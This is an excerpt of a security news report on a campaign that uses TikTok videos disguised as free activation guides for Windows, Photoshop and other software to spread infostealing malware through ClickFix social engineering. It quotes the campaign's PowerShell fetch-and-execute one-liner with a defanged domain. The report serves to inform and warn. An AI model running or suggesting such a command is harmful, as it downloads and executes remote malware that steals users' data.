Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware.
ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one observed by Trend Micro in May
The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.
Malicious videos on TikTok pushing infostealers
Source: BleepingComputer.com
The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:
iex (irm slmgr[.]win/photoshop)
It should be noted that the program name in the URL is different depending on the program that is being impersonated. For example, in the fake Windows activation videos, instead of the URL containing photoshop, it would include windows.
In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.
... continue reading